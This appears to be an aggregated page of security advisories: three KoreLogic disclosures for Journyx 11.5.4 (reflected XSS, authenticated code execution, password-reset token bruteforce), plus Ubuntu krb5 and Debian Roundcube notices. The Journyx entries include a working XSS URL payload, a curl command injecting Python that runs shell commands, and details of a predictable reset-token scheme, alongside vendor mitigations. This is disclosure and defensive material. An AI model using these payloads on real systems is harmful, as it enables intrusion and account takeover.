Journyx version 11.5.4 suffers from a cross site scripting vulnerability due to mishandling of the error_description during an active directory login flow.

KL-001-2024-009: Journyx Reflected Cross Site Scripting

Title: Journyx Reflected Cross Site Scripting  
Advisory ID: KL-001-2024-009  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-81: Improper Neutralization of Script in an Error  
                          Message Web Page  
      CVE ID: CVE-2024-6892

2. Vulnerability Description

      Attackers can craft a malicious link that once clicked  
      will execute arbitrary JavaScript in the context of  
      the Journyx web application.

3. Technical Description

      During the active directory login flow, if an error  
      occurs, the user is redirected to a page containing  
      an error message outlining the problem. The error  
      message shown in the page response is derived from  
      the "error_description" query parameter that appears  
      in the URL. This parameter is not sanitized or validated  
      prior to being reflected, allowing for an attacker to  
      insert malicious HTML/JavaScript into the "error_description"  
      parameter.

      This vulnerability can be exploited regardless of whether  
      active directory authentication has been configured for the  
      Journyx instance.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v13.0.0.

      For self-hosted instances of JournyX, additional security  
      measures (such as input sanitization) can be added by monkey  
      patching the PYC file responsible for handling request  
      parameters (mycgi.pyc).

      1) Rename "mycgi.pyc" to an alternative name, e.g. mycgi_original.pyc.  
           $ mv wt_tar/pi/pylib/wtlib/mycgi.py wt_tar/pi/pylib/wtlib/mycgi_original.py

      2) Create a file named "mycgi.py" in the same directory.  
           $ touch wt_tar/pi/pylib/wtlib/mycgi.py

      3) Insert the following code into the newly created "mycgi.py"

           from mycgi_original import *  
           from html import escape

           def patch():  
               pdata = _parse()

               # force the value of "end_URL" to always be "wte"  
               if pdata.get('end_URL'): pdata['end_URL'] = ['wte']

               # sanitize user-controlled error messages  
               for parameter in ['error', 'error_description']:  
                   if not pdata.get(parameter): continue  
                   pdata[parameter] = [escape(value) for value in pdata[parameter]]

               return pdata

           _parse = parse  
           parse  = patch

      Once these changes have been made, the JournyX native "mycgi.parse()"  
      function will be overwritten with the "patch()" function located in the  
      "mycgi.py" file. Relevant to this advisory, the patch provided above  
      will replace special characters with their respective HTML entity  
      representation for the "error" and "error_description" parameters. This  
      list of parameters can be extended as needed.

      Additionally, if SSO is not required, requests to /jtcgi/r/adlogin/sso  
      could be dropped without forwarding invoking FastCGI via a ModSecurity  
      rule like the one below:

           SecRule REQUEST_URI "@contains adlogin/sso" "id:4,phase:2,deny,log,auditlog"

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     The following URL contains the "error_description"  
     parameter with a value of "%3Csvg%2fonload%3dprompt(%27KoreLogic%27)%3E":

http://redacted.com:8080/jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27KoreLogic%27)%3E&error=error

     This value is automatically URL decoded to "<svg/onload=prompt('KoreLogic')>"  
     and reflected into the page response:

         <div class="errorMessage">  
             Unable to complete sign-on attempt. This is possibly a configuration error in the application registration   
on the Identity Provider (IdP) side. The IdP server said:  
             <p>error <b><svg onload="prompt('KoreLogic')"></svg></b></p>  
         </div>

     Once this link is clicked or visited in a browser, the  
     javascript function "prompt()" is executed, and a display  
     box is presented, thereby validating the execution of  
     arbitrary JavaScript.

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Cross Site Scripting

Ubuntu Security Notice 6947-1 - It was discovered that Kerberos incorrectly handled GSS message tokens where an unwrapped token could appear to be truncated. An attacker could possibly use this issue to cause a denial of service. It was discovered that Kerberos incorrectly handled GSS message tokens when sent a token with invalid length fields. An attacker could possibly use this issue to cause a denial of service.

==========================================================================

Ubuntu Security Notice USN-6947-1  
August 08, 2024

krb5 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Kerberos could be made to crash if it received specially crafted  
input.

Software Description:  
- krb5: MIT Kerberos Network Authentication Protocol

Details:

It was discovered that Kerberos incorrectly handled GSS message tokens  
where an unwrapped token could appear to be truncated. An attacker  
could possibly use this issue to cause a denial of service.  
(CVE-2024-37370)

It was discovered that Kerberos incorrectly handled GSS message tokens  
when sent a token with invalid length fields. An attacker could possibly  
use this issue to cause a denial of service. (CVE-2024-37371)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   krb5-admin-server               1.20.1-6ubuntu2.1  
   krb5-kdc                        1.20.1-6ubuntu2.1  
   krb5-kdc-ldap                   1.20.1-6ubuntu2.1  
   krb5-otp                        1.20.1-6ubuntu2.1  
   krb5-pkinit                     1.20.1-6ubuntu2.1  
   krb5-user                       1.20.1-6ubuntu2.1  
   libgssapi-krb5-2                1.20.1-6ubuntu2.1  
   libgssrpc4t64                   1.20.1-6ubuntu2.1  
   libk5crypto3                    1.20.1-6ubuntu2.1  
   libkadm5clnt-mit12              1.20.1-6ubuntu2.1  
   libkadm5srv-mit12               1.20.1-6ubuntu2.1  
   libkdb5-10t64                   1.20.1-6ubuntu2.1  
   libkrad0                        1.20.1-6ubuntu2.1  
   libkrb5-3                       1.20.1-6ubuntu2.1  
   libkrb5support0                 1.20.1-6ubuntu2.1

Ubuntu 22.04 LTS  
   krb5-admin-server               1.19.2-2ubuntu0.4  
   krb5-kdc                        1.19.2-2ubuntu0.4  
   krb5-kdc-ldap                   1.19.2-2ubuntu0.4  
   krb5-otp                        1.19.2-2ubuntu0.4  
   krb5-pkinit                     1.19.2-2ubuntu0.4  
   krb5-user                       1.19.2-2ubuntu0.4  
   libgssapi-krb5-2                1.19.2-2ubuntu0.4  
   libgssrpc4                      1.19.2-2ubuntu0.4  
   libk5crypto3                    1.19.2-2ubuntu0.4  
   libkadm5clnt-mit12              1.19.2-2ubuntu0.4  
   libkadm5srv-mit12               1.19.2-2ubuntu0.4  
   libkdb5-10                      1.19.2-2ubuntu0.4  
   libkrad0                        1.19.2-2ubuntu0.4  
   libkrb5-3                       1.19.2-2ubuntu0.4  
   libkrb5support0                 1.19.2-2ubuntu0.4

Ubuntu 20.04 LTS  
   krb5-admin-server               1.17-6ubuntu4.6  
   krb5-kdc                        1.17-6ubuntu4.6  
   krb5-kdc-ldap                   1.17-6ubuntu4.6  
   krb5-otp                        1.17-6ubuntu4.6  
   krb5-pkinit                     1.17-6ubuntu4.6  
   krb5-user                       1.17-6ubuntu4.6  
   libgssapi-krb5-2                1.17-6ubuntu4.6  
   libgssrpc4                      1.17-6ubuntu4.6  
   libk5crypto3                    1.17-6ubuntu4.6  
   libkadm5clnt-mit11              1.17-6ubuntu4.6  
   libkadm5srv-mit11               1.17-6ubuntu4.6  
   libkdb5-9                       1.17-6ubuntu4.6  
   libkrad0                        1.17-6ubuntu4.6  
   libkrb5-3                       1.17-6ubuntu4.6  
   libkrb5support0                 1.17-6ubuntu4.6

Ubuntu 18.04 LTS  
   krb5-admin-server               1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-user                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit11              1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit11               1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkdb5-9                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrad0                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   krb5-admin-server               1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-user                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit9               1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit9                1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkdb5-8                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrad0                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   krb5-admin-server               1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-user                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit9               1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit8                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit9                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkdb5-7                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrad0                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6947-1   
<https://ubuntu.com/security/notices/USN-6947-1>  
   CVE-2024-37370, CVE-2024-37371

Package Information:  
https://launchpad.net/ubuntu/+source/krb5/1.20.1-6ubuntu2.1   
<https://launchpad.net/ubuntu/+source/krb5/1.20.1-6ubuntu2.1>  
https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.4   
<https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.4>  
https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.6   
<https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.6>

Ubuntu Security Notice USN-6947-1

Journyx version 11.5.4 has an issue where attackers with a valid username and password can exploit a python code injection vulnerability during the natural login flow.

KL-001-2024-008: Journyx Authenticated Remote Code Execution

Title: Journyx Authenticated Remote Code Execution  
Advisory ID: KL-001-2024-008  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-008.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-94: Improper Control of Generation of Code  
                          ('Code Injection'), CWE-95: Improper Neutralization  
                          of Directives in Dynamically Evaluated Code  
                          ('Eval Injection')  
      CVE ID: CVE-2024-6891

2. Vulnerability Description

      Attackers with a valid username and password can exploit  
      a python code injection vulnerability during the natural  
      login flow.

3. Technical Description

      When utilizing a username and password to authenticate to  
      Journyx via the web interface, an HTTP request is sent to  
      "wtlogin.pyc" containing the credentials. Upon a successful  
      login, the user is redirected to "wte.pyc" or the URL specified  
      in the "end_URL" body parameter if one is supplied.

      An additional condition is present, however. If the  
      "end_URL" value is over 1,000 characters, the value is instead  
      interpolated into a python "import" statement which is passed  
      into the "exec()" function, thereby executing arbitrary code.

      Code snippet from "wtlogin.pyc":

      finalURL = end_URL + '.pyc?' + genlib.URLEncodeParams(params)  
      if len(finalURL) < 1000:  
          raise genlib.HTTP302Found(finalURL)  
      else:  
          exec('import %s; %s.main()' % (end_URL, end_URL))

      The "params" variable is derived from the query parameters  
      included in the login request, so the size of "finalURL"  
      is trivial to inflate.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v12.0.0, which is the first wholly cloud-hosted version of  
      this product.

      For self-hosted instances of JournyX, additional security  
      measures (such as input sanitization) can be added by monkey  
      patching the PYC file responsible for handling request  
      parameters (mycgi.pyc).

      1) Rename "mycgi.pyc" to an alternative name, e.g. mycgi_original.pyc.  
           $ mv wt_tar/pi/pylib/wtlib/mycgi.py wt_tar/pi/pylib/wtlib/mycgi_original.py

      2) Create a file named "mycgi.py" in the same directory.  
           $ touch wt_tar/pi/pylib/wtlib/mycgi.py

      3) Insert the following code into the newly created "mycgi.py"

           from mycgi_original import *  
           from html import escape

           def patch():  
               pdata = _parse()

               # force the value of "end_URL" to always be "wte"  
               if pdata.get('end_URL'): pdata['end_URL'] = ['wte']

               # sanitize user-controlled error messages  
               for parameter in ['error', 'error_description']:  
                   if not pdata.get(parameter): continue  
                   pdata[parameter] = [escape(value) for value in pdata[parameter]]

               return pdata

           _parse = parse  
           parse  = patch

      Once these changes have been made, the JournyX native "mycgi.parse()"  
      function will be overwritten with the "patch()" function located in the  
      "mycgi.py" file. Relevant to this advisory, the patch provided above  
      will force the "end_URL" parameter to always have a value of "wte".

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     By leveraging the existing "web" python module, it is possible  
     to see the output of shell commands as returned by "os.popen()".

     [attacker@box]$ HOST='redacted.com'; PORT='8080'; USERNAME='employee'; PASSWORD='password123'; COMMAND='id'; \  
                     curl -x http://localhost:8080 -X POST \  
                          -d   
"wtusername=$USERNAME&wtpassword=$PASSWORD&end_URL=os,web%0aweb.response.text%3dos.popen('$COMMAND').read()#&timestamp=9999999999&pageid=$RANDOM"   
\  
                          -H 'Cookie: wtsession=foobar' \  
"http://$HOST:$PORT/jtcgi/wtlogin.pyc?z=$(printf 'Z%.0s' {1..1000})"

     uid=1000(foo) gid=1000(foo)   
groups=1000(foo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)  
     [attacker@box]$

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Authenticated Remote Code Execution

Debian Linux Security Advisory 5743-1 - Multiple cross-site scripting vulnerabilities were discovered in RoundCube webmail.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5743-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 08, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : roundcube  
CVE ID         : CVE-2024-42008 CVE-2024-42009 CVE-2024-42010

Multiple cross-site scripting vulnerabilities were discovered in  
RoundCube webmail.

 For the stable distribution (bookworm), these problems have been fixed in  
version 1.6.5+dfsg-1+deb12u3.

We recommend that you upgrade your roundcube packages.

For the detailed security status of roundcube please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/roundcube

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma0oZkACgkQEMKTtsN8  
TjYxhA//UCLgEJvU4lRhVKupyDDsLgIxy4yWCvwDORqLtckWd83mJZXqbnUQYOUU  
bvTaAHZ5XEEQ8mNwviDwgQZoSK7hY0ZHPb3NSbuc/2hl6aVUp9BqxzQ0iZ4haxiY  
LtbqB29zpelXB0orRgH+rNISBLwAei2C+Vf213TKTmceiUGzhRxvkJKr4H++W2b6  
7OkAoYqXIIH8OvKJmMgLirW/+toGR29c9F29d+C3Oyq/Qis0e/6osDIehFAdayro  
EGJAvoUm72Vfe+syTF3csItT4vtf73qMb51CP67ATeGZ29j7bllqHgybLfjfZyI7  
a4v5/VUGe+tDxvFiSsPCpBDuin843qt3rflrcy/LFaVvrYa7/SIcwV84uxVrjf85  
mwwlIIud8n01EY7oPw0LK51a6MIrniFePAC3/KyYgBhya+hKE1T3JLQ/8XDRk/zo  
M9Mqu1MbtamhjAeTdzkckRr+9ho+meY5un1MmnPtVIMoAaNhG/AteeqAuwCtucAF  
Fg36kslrDwd+ojYUavIaE3AoRoLRzto5aAy46tXCE5JSakw2haKpBHoQfAhFwLZ/  
59xds+gu7lRWp71Qhx2xBYclJ9XGNsdyx1g8Dzt0tPTQxwHCShP3fI2Wit8QOsWu  
VeqdGxyqGT+cFrTmWRaVCKRQOsUgLjTpY2Nm5aKorBdD1HT8FU0=  
=eXCy  
-----END PGP SIGNATURE-----

Debian Security Advisory 5743-1

Journyx version 11.5.4 suffers from an issue where password reset tokens are generated using an insecure source of randomness. Attackers who know the username of the Journyx installation user can bruteforce the password reset and change the administrator password.

KL-001-2024-007: Journyx Unauthenticated Password Reset Bruteforce

Title: Journyx Unauthenticated Password Reset Bruteforce  
Advisory ID: KL-001-2024-007  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-007.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-321: Use of Hard-coded Cryptographic Key,  
                          CWE-334: Small Space of Random Values,  
                          CWE-799: Improper Control of Interaction Frequency  
      CVE ID: CVE-2024-6890

2. Vulnerability Description

      Password reset tokens are generated using an insecure source  
      of randomness. Attackers who know the username of the Journyx  
      installation user can bruteforce the password reset and change  
      the administrator password.

3. Technical Description

     From an unauthenticated perspective, a user can initiate the  
     password reset flow by clicking the "Reset your password" button  
     on the Journyx login screen and supplying a valid username. A  
     password reset link containing a "random" token is sent to the  
     email address associated with the username.

     The password reset token is generated using the current epoch  
     and the user ID associated with the request. The user ID is  
     a 128-bit UUID for every user *except* for the user created  
     during the initial setup of the Journyx instance, i.e., the  
     system administrator account. For this single user, the user  
     ID defaults to the username. By targeting this user, the need  
     to leak a UUID is removed entirely. If the Journyx instance was  
     configured according to the official System Administration guide  
(https://journyx.com/Files/Journyx_Sysadmin_and_Recovery_v11.pdf),  
     the username is "journyx". Alternatively, the username can be  
     leaked via stacktraces.

     When generating the token, a secret key is created by inserting  
     the user ID inbetween the strings 'chuck' and 'palahniuk':

         mysessiontoken = 'chuck%spalahniuk' % me

     This key is used to XOR the string literal representation of  
     the list object "[userID, time.time()]". The output of the XOR  
     function is then base64 encoded:

         eStr = xor_str(istr, key)  
         aStr = binascii.b2a_base64(eStr).strip()

     Since the user ID is a known value, only the output of  
     "time.time()" (the epoch at the time of "encryption") is  
     unknown. However, by opening a TCP connection and noting the  
     epoch immediately after sending an HTTP request to initiate  
     the password reset flow, a pool of tokens can be generated by  
     incrementing the epoch. There is a high degree of certainty  
     the valid reset token is contained within a pool larger than  
     50,000 tokens.

     Depending upon network latency and other external factors,  
     a successful bruteforce attack using these tokens can take  
     anywhere from several minutes to over an hour.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v12.0.0, which is the first wholly cloud-hosted version of  
      this product.

      For self-hosted versions of Journyx, one incremental  
      improvement is to disable user-initiated password reset  
      functionality in the application settings.

      1) Log into the JournyX web application as an administrator  
      2) Navigate to Configuration -> System Settings -> Security Settings  
      3) Ensure the checkbox labeled "Show a password reset button on login  
         screen" is disabled.  
      4) Click the "Save" button

      Another option would be to monkey patch the .pyc file that  
      contains these hardcoded strings, ./wtdoc.pyc, by deploying a .py  
      file that uses unique strings and then loads wtdoc_original.pyc  
      (see KL-001-2024-008 and KL-001-2024-009 for examples).

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     The following script automatically exploits this issue by initiating  
     a password reset flow and bruteforces the value after generating a  
     list of 50,000 tokens.

     [attacker@box]$ python unauth2rce.py --url http://redacted.com:8080/ --username foo --command id  
     [*] Beginning Attack. Using the following timestamp: "1706708084.2051988"  
     [+] New Password Generated: 2DCD5AE1F0F34B84A1E0F1FB5768219B

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Unauthenticated Password Reset Bruteforce

**What is the version information for this release?**

Microsoft Edge Channel

Microsoft Edge Version

Based on Chromium Version

Date Released

Stable

127.0.2651.98

127.0.6533.99/.100

8/8/2024

Latest News